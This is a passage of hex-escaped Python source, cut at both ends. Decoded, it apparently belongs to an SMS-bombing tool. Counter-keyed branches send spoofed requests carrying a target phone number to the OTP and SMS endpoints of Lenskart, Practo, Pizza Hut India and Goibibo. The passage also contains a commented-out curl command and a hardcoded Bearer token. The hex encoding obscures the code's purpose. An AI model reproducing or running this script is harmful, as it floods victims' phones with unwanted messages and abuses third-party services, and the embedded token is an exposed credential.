\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x44\x4e\x54\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x75\x62\x6d\x69\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x3a\x20\x27\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x2f\x63\x6c\x69\x65\x6e\x74\x73\x2f\x6c\x65\x6e\x73\x6b\x61\x72\x74\x2f\x73\x6d\x73\x41\x70\x69\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20
\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x39\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x27\x3a\x20\x27\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x32\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x41\x6e\x64\x72\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x27\x3a\x20\x27\x31\x35\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20
\x27\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x39\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x27\x3a\x27\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x3a\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x3a\x32\x2e\x30\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x3a\x41\x6e\x64\x72
\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x3a\x31\x35\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x3a\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x22\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x39\x36\x22\x20\x2d\x64\x20\x20\x22\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x3d\x50\x72\x61\x63\x74\x6f\x2b\x41\x6e\x64\x72\x6f\x69\x64\x2b\x41\x70\x70\x26\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x3d\x26\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x3d\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x26\x22\x20\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x75\x63\x63\x65\x73\x73\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x6d\x2e\x70\x69
\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x75\x74\x68\x6f\x72\x69\x7a\x61\x74\x69\x6f\x6e\x27\x3a\x20\x27\x42\x65\x61\x72\x65\x72\x20\x5a\x58\x6c\x4b\x61\x47\x4a\x48\x59\x32\x6c\x50\x61\x55\x70\x4a\x56\x58\x70\x4a\x4d\x55\x35\x70\x53\x58\x4e\x4a\x62\x6c\x49\x31\x59\x30\x4e\x4a\x4e\x6b\x6c\x72\x63\x46\x68\x57\x51\x30\x6f\x35\x4c\x6d\x56\x35\x53\x6d\x74\x5a\x57\x46\x4a\x6f\x53\x57\x70\x77\x4e\x30\x6c\x75\x55\x6e\x5a\x68\x4d\x6c\x5a\x31\x53\x57\x70\x76\x61\x57\x49\x7a\x51\x58\x68\x69\x52\x30\x70\x79\x5a\x45\x63\x78\x62\x47\x52\x59\x53\x54\x42\x4e\x57\x45\x4a\x79\x54\x6c\x52\x47\x4e\x57\x4e\x71\x51\x6a\x42\x6b\x62\x55\x5a\x73\x53\x57\x6c\x33\x61\x56\x6c\x59\x56\x6a\x42\x68\x51\x30\x6b\x32\x53\x57\x31\x57\x4e\x56\x4e\x71\x51\x6d\x78\x58\x52\x55\x5a\x77\x56\x44\x4a\x73\x53\x31\x4d\x78\x57\x58\x68\x56\x56\x32\x78\x4e\x55\x54\x42\x77\x62\x31\x6c\x72\x5a\x47\x70\x68\x56\x54\x6c\x77\x55\x32\x74\x73\x56\x6d\x56\x72\x61\x33\x68\x55\x62\x57\x78\x4c\x54\x31\x4d\x31\x62\x47\x56\x56\x63\x44\x46\x58\x56\x6d\x4e\x34\x59\x6b\x64\x47\x57\x46\x56\x58\x62\x46\x42\x68\x56\x57\x74\x33\x56\x47\x74\x53\x62\x6d\x46\x56\x65\x45\x52\x54\x62\x6d\x52\x71\x59\x6c\x64\x34\x4d\x46\x64\x57\x61\x45\x74\x4f\x56\x6d\x39\x36\x55\x32\x35\x61\x61\x31\x64\x46\x53\x6a\x5a\x5a\x56\x6d\x52\x53\x59\x56\x55\x35\x63\x46\x4e\x55\x56\x6c\x42\x53\x4d\x55\x59\x30\x56\x44\x42\x6b\x55\x6b\x35\x46\x4d\x58\x42\x4e\x56\x32\x78\x61\x56\x6b\x5a\x56\x4d\x56\x52\x47\x55\x6c\x4a\x4f\x56\x54\x56\x56\x57\x54\x4e\x53\x55\x46\x59\x77\x4d\x44\x46\x55\x56\x32\x74\x33\x5a\x57\x78\x77\x63\x56\x70\x36\x56\x6b\x35\x68\x61
\x30\x56\x36\x56\x31\x5a\x53\x54\x6b\x31\x47\x63\x48\x46\x58\x56\x32\x78\x4e\x55\x54\x42\x77\x64\x31\x6c\x36\x54\x6b\x35\x68\x56\x54\x6c\x77\x55\x32\x30\x35\x61\x31\x4e\x47\x53\x6a\x4e\x55\x4d\x6d\x73\x30\x5a\x47\x31\x52\x65\x6c\x70\x45\x54\x6b\x31\x69\x56\x45\x5a\x76\x57\x54\x49\x31\x55\x32\x4e\x57\x62\x46\x68\x55\x62\x6b\x70\x4e\x59\x6c\x55\x31\x4d\x6c\x6c\x73\x54\x54\x56\x68\x4d\x58\x42\x5a\x56\x32\x31\x34\x61\x56\x4a\x36\x62\x44\x4e\x58\x62\x47\x68\x4c\x59\x55\x64\x4f\x53\x47\x45\x79\x62\x45\x31\x52\x4d\x48\x42\x76\x57\x6b\x5a\x6b\x55\x6d\x46\x56\x4f\x58\x42\x54\x62\x54\x6c\x72\x55\x30\x5a\x4b\x4d\x31\x51\x79\x61\x7a\x52\x6b\x62\x56\x46\x36\x57\x6b\x52\x4f\x54\x57\x4a\x55\x52\x6d\x39\x5a\x4d\x6a\x56\x54\x59\x31\x5a\x73\x57\x46\x52\x75\x53\x6b\x31\x69\x56\x54\x55\x79\x57\x57\x78\x4e\x4e\x57\x45\x78\x63\x46\x6c\x58\x62\x58\x68\x70\x55\x6e\x70\x73\x4d\x31\x64\x73\x61\x45\x74\x68\x52\x30\x35\x49\x59\x54\x4a\x73\x54\x56\x45\x77\x63\x48\x4e\x61\x56\x57\x68\x43\x59\x56\x55\x35\x63\x56\x4a\x55\x52\x6b\x39\x57\x52\x33\x4d\x78\x56\x47\x35\x77\x61\x6b\x31\x56\x4d\x55\x56\x56\x57\x45\x35\x4b\x59\x6c\x52\x57\x63\x46\x64\x74\x62\x45\x70\x4f\x61\x7a\x46\x56\x56\x6c\x52\x47\x55\x46\x5a\x48\x63\x33\x70\x55\x57\x48\x42\x79\x5a\x44\x41\x31\x53\x55\x31\x44\x4e\x56\x52\x61\x4d\x31\x70\x34\x55\x6d\x78\x4f\x5a\x6c\x64\x74\x54\x54\x4e\x61\x53\x45\x35\x70\x54\x56\x64\x53\x4e\x47\x4a\x57\x56\x6b\x64\x6b\x53\x45\x45\x78\x59\x57\x35\x57\x4d\x6b\x39\x46\x4e\x54\x56\x57\x65\x6b\x49\x79\x5a\x44\x45\x35\x54\x56\x52\x75\x54\x6b\x4a\x4e\x62\x57\x68\x47\x56\x6b\x56\x30\x65\x6b\x6c\x70\x64\x32\x6c\x6b\x57\x45\x4a\x72\x57\x56\x68\x53\x62\x46\x70\x44\x53\x54\x5a\x4e\x56\x46\x55\x78\x54\x31\x52\x72\x4d\x30\x31\x36\x61\x33\x64\x4f\x52\x46\x55\x78\x54\x6e\x6c\x33\x61\x57\x52\x59\x54\x6d\x78\x6a\x61\x32\x78\x72\x53\x57\x70\x76\x61\x55\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x45\x31\x45\x51\x58\x64\x4e\x51\x7a\x42\x33\x54\x55\x52\x42\x64\x30\x78\x55\x51\x58\x64\x4e\x52\x45\x46\x30\x54
\x55\x52\x42\x64\x30\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x30\x6c\x70\x64\x32\x6c\x61\x4d\x6c\x5a\x31\x57\x6c\x68\x4b\x61\x47\x52\x48\x56\x6d\x74\x4a\x61\x6d\x39\x34\x54\x6c\x52\x56\x4e\x55\x39\x55\x59\x33\x70\x50\x56\x45\x45\x77\x54\x6c\x52\x56\x4d\x32\x5a\x54\x64\x32\x6c\x68\x56\x30\x59\x77\x53\x57\x70\x76\x65\x45\x35\x55\x56\x54\x56\x50\x56\x47\x4e\x36\x54\x31\x52\x42\x4d\x45\x78\x44\x53\x6d\x78\x6c\x53\x45\x46\x70\x54\x32\x70\x46\x4d\x55\x35\x71\x51\x54\x52\x4e\x65\x6d\x4d\x31\x54\x55\x52\x53\x4f\x53\x35\x43\x4d\x47\x52\x31\x4e\x46\x6c\x45\x51\x56\x70\x74\x54\x47\x4e\x55\x4d\x30\x5a\x48\x4d\x30\x52\x70\x53\x6e\x51\x78\x4e\x33\x52\x7a\x52\x47\x6c\x4a\x61\x56\x5a\x6b\x55\x46\x6c\x34\x5a\x48\x49\x79\x56\x7a\x6c\x74\x65\x6e\x6b\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x73\x6f\x75\x72\x63\x65\x2d\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x50\x57\x41\x46\x57\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x6e\x67\x75\x61\x67\x65\x63\x6f\x64\x65\x27\x3a\x20\x27\x65\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x6c\x6f\x67\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x41\x4b\x41\x5f\x41\x32\x3d\x41\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x75\x73\x74\x6f\x6d\x65\x72\x22\x3a\x7b\x22\x4d\x6f\x62\x69\x6c\x65\x4e\x6f\x22\x3a\x70\x6e\x2c\x22\x55\x73\x65\x72\x4e\x61\x6d\x65\x22\x3a\x70\x6e\x2c\x22\x6d\x65\x72\x63\x68\x61\x6e\x74\x49\x64\x22\x3a\x22\x39\x38\x64\x31\x38\x64\x38\x32\x2d\x62\x61\x35\x39\x2d\x34\x39\x35\x37\x2d\x39\x63\x39\x32\x2d\x33\x66\x38\x39\x32\x30\x37\x61\x33\x34\x66\x36\x22\x7d\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x61\x72\x74\x2f\x73\x65\x6e\x64\x2d\x6f\x74\x70\x3f\x6c\x61\x6e\x67\x43\x6f\x64\x65\x3d\x65\x6e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61
\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x33\x32\x3b\x20\x78\x33\x32\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x37\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x3f\x73\x6d\x73\x3d\x73\x75\x63\x63\x65\x73\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74
